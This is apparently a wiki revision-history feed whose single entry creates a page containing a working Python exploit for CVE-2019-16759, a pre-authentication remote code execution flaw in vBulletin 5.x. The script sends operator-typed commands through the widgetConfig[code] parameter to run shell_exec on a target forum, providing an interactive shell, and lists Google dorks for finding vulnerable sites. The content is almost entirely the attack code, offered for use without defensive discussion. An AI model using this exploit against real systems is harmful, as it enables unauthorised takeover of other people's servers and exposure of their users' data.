https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-16759_vBulletin_5.x_RCE%E6%BC%8F%E6%B4%9E
CVE-2019-16759 vBulletin 5.x RCE漏洞 - Revision history
2026-04-17T12:48:51Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-16759_vBulletin_5.x_RCE%E6%BC%8F%E6%B4%9E&diff=1674&oldid=prev
Pwnwiki: Created page with "==POC== <pre> #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin...."
2021-04-15T05:35:48Z
<p>Created page with "==POC== <pre> #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin...."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
#!/usr/bin/python<br />
#<br />
# vBulletin 5.x 0day pre-auth RCE exploit<br />
# <br />
# This should work on all versions from 5.0.0 till 5.5.4<br />
#<br />
# Google Dorks:<br />
# - site:*.vbulletin.net<br />
# - "Powered by vBulletin Version 5.5.4"<br />
<br />
import requests<br />
import sys<br />
<br />
if len(sys.argv) != 2:<br />
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])<br />
<br />
proxies ={<br />
"http":"http://127.0.0.1:8080/"<br />
}<br />
params = {"routestring":"ajax/render/widget_php"}<br />
<br />
while True:<br />
try:<br />
cmd = raw_input(">>>Shell= ")<br />
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"<br />
r = requests.post(url = sys.argv[1], data = params, proxies=proxies)<br />
if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:<br />
print<br />
print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]<br />
else:<br />
sys.exit("Exploit failed! :(")<br />
except KeyboardInterrupt:<br />
sys.exit("\nClosing shell...")<br />
except Exception, e:<br />
sys.exit(str(e))<br />
</pre></div>
Pwnwiki